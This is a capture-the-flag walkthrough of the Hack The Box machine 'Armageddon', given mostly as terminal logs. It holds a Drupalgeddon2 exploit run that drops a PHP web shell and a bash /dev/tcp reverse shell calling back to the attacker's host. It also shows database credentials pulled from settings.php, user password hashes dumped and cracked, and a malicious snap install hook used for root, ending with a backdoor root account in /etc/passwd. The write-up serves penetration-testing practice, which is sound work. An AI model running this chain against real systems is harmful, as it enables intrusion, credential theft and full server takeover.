Armageddon starts off by exploiting the drupal web server. The exploit name is in the name of the box. After gaining the apache shell, mysql creds can be found in a web server config file. Credentials for brucetherealadmin are gained from mysql. As brucetherealadmin we have a sudo ability to install snap packges. We install a malicious snap package and gain root.
# Nmap 7.91 scan initiated Thu Sep 30 09:46:05 2021 as: nmap -p- -oN ping_tcp 10.129.48.89
Nmap scan report for 10.129.48.89
Host is up (0.041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Thu Sep 30 09:46:29 2021 -- 1 IP address (1 host up) scanned in 24.49 seconds
# Nmap 7.91 scan initiated Thu Sep 30 09:46:50 2021 as: nmap -p22,80 -sV -sC -oN script_tcp 10.129.48.89
Nmap scan report for 10.129.48.89
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 30 09:47:07 2021 -- 1 IP address (1 host up) scanned in 16.24 seconds
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
┌──(kali㉿kali)-[~/Documents/htb/Armageddon/nmap]
└─$ searchsploit drupal 7.5
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasp | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Exe | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Documents/htb/Armageddon/nmap]
└─$ searchsploit -m 44449 130 ⨯
Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
URL: https://www.exploit-db.com/exploits/44449
Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text
Copied to: /home/kali/Documents/htb/Armageddon/nmap/44449.rb
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ ruby 44449.rb http://10.129.48.89
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.129.48.89/
--------------------------------------------------------------------------------
[+] Found : http://10.129.48.89/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo DGAJYSXB
[+] Result : DGAJYSXB
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.129.48.89/shell.php)
[!] Response: HTTP 200 // Size: 6. ***Something could already be there?***
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.129.48.89/shell.php' -d 'c=hostname'
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
armageddon.htb>>
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ cat rev.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.30/4444 0>&1'") ?>
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
armageddon.htb>> pwd
/var/www/html
armageddon.htb>> curl http://10.10.14.30/rev.php -o rev.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 71 100 71 0 0 785 0 --:--:-- --:--:-- --:--:-- 788
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ curl http://10.129.48.89/rev.php
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.48.89.
Ncat: Connection from 10.129.48.89:45890.
bash: no job control in this shell
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
bash-4.2$
bash-4.2$ python3 -c "import pty;pty.spawn('/bin/bash');"
python3 -c "import pty;pty.spawn('/bin/bash');"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/lib64/python3.6/pty.py", line 154, in spawn
pid, master_fd = fork()
File "/usr/lib64/python3.6/pty.py", line 96, in fork
master_fd, slave_fd = openpty()
File "/usr/lib64/python3.6/pty.py", line 29, in openpty
master_fd, slave_name = _open_terminal()
File "/usr/lib64/python3.6/pty.py", line 59, in _open_terminal
raise OSError('out of pty devices')
OSError: out of pty devices
bash-4.2$ grep -irn password
grep -irn password
CHANGELOG.txt:87:- Fixed that following a password reset link while logged in leaves users unable
CHANGELOG.txt:88: to change their password (minor user interface change:
CHANGELOG.txt:322: elements, such as textfields, textareas, and password fields (API change:
CHANGELOG.txt:571:- Changed the password reset form to pre-fill the username when requested via a
CHANGELOG.txt:745:- Introduced a 'user_password_reset_timeout' variable to allow the 24-hour
CHANGELOG.txt:746: expiration for user password reset links to be adjusted (API addition).
CHANGELOG.txt:914:- Fixed usability bug with first password field being pre-filled by certain
CHANGELOG.txt:971:- More secure password generation.
CHANGELOG.txt:1032: * Implemented a pluggable password system and much stronger password hashes
CHANGELOG.txt:1033: that are compatible with the Portable PHP password hashing framework.
CHANGELOG.txt:1034: * Rate limited login attempts to prevent brute-force password guessing, and
CHANGELOG.txt:1063: * Redesigned password strength validator.
CHANGELOG.txt:1304: Password leakage in URL), see SA-CORE-2009-007.
CHANGELOG.txt:1437: * Dynamically check password strength and confirmation.
CHANGELOG.txt:1517:- Fixed security issues (Cross site scripting and Password leakage in URL), see
CHANGELOG.txt:1766: * Reworked the 'request new password' functionality.
includes/ajax.inc:713: case 'password':
includes/authorize.inc:38: '#markup' => t('WARNING: You are not using an encrypted connection, so your password will be sent in plain text. <a href="@https-link">Learn more</a>.', array('@https-link' => 'http://drupal.org/https-information')),
includes/authorize.inc:247: // We do *not* want to store passwords in the database, unless the
includes/authorize.inc:252: if ($form['connection_settings'][$filetransfer_backend][$key]['#type'] != 'password') {
includes/authorize.inc:263: // Save the connection settings minus the password.
includes/common.inc:847: // Add in username and password to Proxy-Authorization header if needed.
includes/common.inc:849: $proxy_password = variable_get('proxy_password', '');
includes/common.inc:850: $options['headers']['Proxy-Authorization'] = 'Basic ' . base64_encode($proxy_username . (!empty($proxy_password) ? ":" . $proxy_password : ''));
includes/common.inc:1253: (?:(?:[\w\.\-\+!$&'\(\)*\+,;=]|%[0-9a-f]{2})+:)* # a username or a username and password
(Lines Removed)
sites/default/settings.php:70: * 'password' => 'password',
sites/default/settings.php:84: * username, password, host, and database name.
sites/default/settings.php:122: * 'password' => 'password',
sites/default/settings.php:137: * 'password' => 'password',
sites/default/settings.php:229: * 'password' => 'password',
sites/default/settings.php:237: * 'password' => 'password',
sites/default/settings.php:254: 'password' => 'CQHEy@9M*m23gBVj',
sites/default/settings.php:579: * by using the username and password variables. The proxy_user_agent variable
sites/default/settings.php:588:# $conf['proxy_password'] = '';
themes/bartik/css/ie.css:5:#password-strength-text {
themes/bartik/css/style-rtl.css:135:/* -------------- Password Meter ------------- */
themes/bartik/css/style-rtl.css:137:#password-strength {
themes/bartik/css/style-rtl.css:142:#password-strength-text {
themes/bartik/css/style-rtl.css:221:.password-suggestions ul li {
themes/bartik/css/style.css:1062:/* -------------- Password Meter ------------- */
themes/bartik/css/style.css:1065:.password-parent {
themes/bartik/css/style.css:1068:.password-parent,
themes/bartik/css/style.css:1069:div.form-item div.password-suggestions {
themes/bartik/css/style.css:1072:.password-strength-text,
themes/bartik/css/style.css:1073:.password-strength-title,
themes/bartik/css/style.css:1074:div.password-confirm {
themes/bartik/css/style.css:1077:.password-strength-text {
themes/bartik/css/style.css:1080:div.password-confirm {
themes/bartik/css/style.css:1242:.password-suggestions ul li {
themes/bartik/css/style.css:1415:div.password-suggestions {
cat sites/default/settings.php | grep CQHEy@ -A 5 -B 5
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
bash-4.2$ mysql -e 'show databases;' -u drupaluser -p'CQHEy@9M*m23gBVj'
mysql -e 'show databases;' -u drupaluser -p'CQHEy@9M*m23gBVj'
Database
information_schema
drupal
mysql
performance_schema
bash-4.2$ mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog
bash-4.2$ mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
<* from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
3 asd $S$D40oou5E4SEXknHp0Y1I.tA/sc1Bm4VxDF7BzUiv40UF2XwFYmfg asd@asd.com filtered_html1633012858 0 0 0 Europe/London 0 asd@asd.com NULL
bash-4.2$
.\hashcat.exe -a 0 -m 7900 hashes.txt rockyou.txt
hashcat (v6.2.3) starting
Successfully initialized NVIDIA CUDA library.
Failed to initialize NVIDIA RTC library.
* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.1.96) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: GeForce RTX 3090, 22912/24576 MB (6144 MB allocatable), 82MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit
* (null)
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1102 MB
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921529
* Keyspace..: 14344385
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Drupal7
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Thu Sep 30 10:57:54 2021 (4 secs)
Time.Estimated...: Thu Sep 30 10:57:58 2021 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 78215 H/s (8.35ms) @ Accel:4 Loops:64 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 335872/14344385 (2.34%)
Rejected.........: 0/335872 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:32704-32768
Candidate.Engine.: Device Generator
Candidates.#1....: PencilKeyboardScanner123 -> sacro
Hardware.Mon.#1..: Temp: 53c Fan: 30% Util: 99% Core:1830MHz Mem:9501MHz Bus:16
Started: Thu Sep 30 10:57:42 2021
Stopped: Thu Sep 30 10:57:59 2021
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ sshpass -p booboo ssh brucetherealadmin@10.129.48.89
Last login: Thu Sep 30 16:59:11 2021 from 10.10.14.30
[brucetherealadmin@armageddon ~]$
[brucetherealadmin@armageddon tmp]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY
HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
[brucetherealadmin@armageddon tmp]$ curl http://10.10.14.30/xxxx_1.0_all.snap -o xxxx_1.0_all.snap
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install ./xxxx_1.0_all.snap --dangerous --devmode
xxxx 1.0 installed
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd | tail
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
root2:S3g6q5KuTzNkU:0:0:root:/root:/bin/bash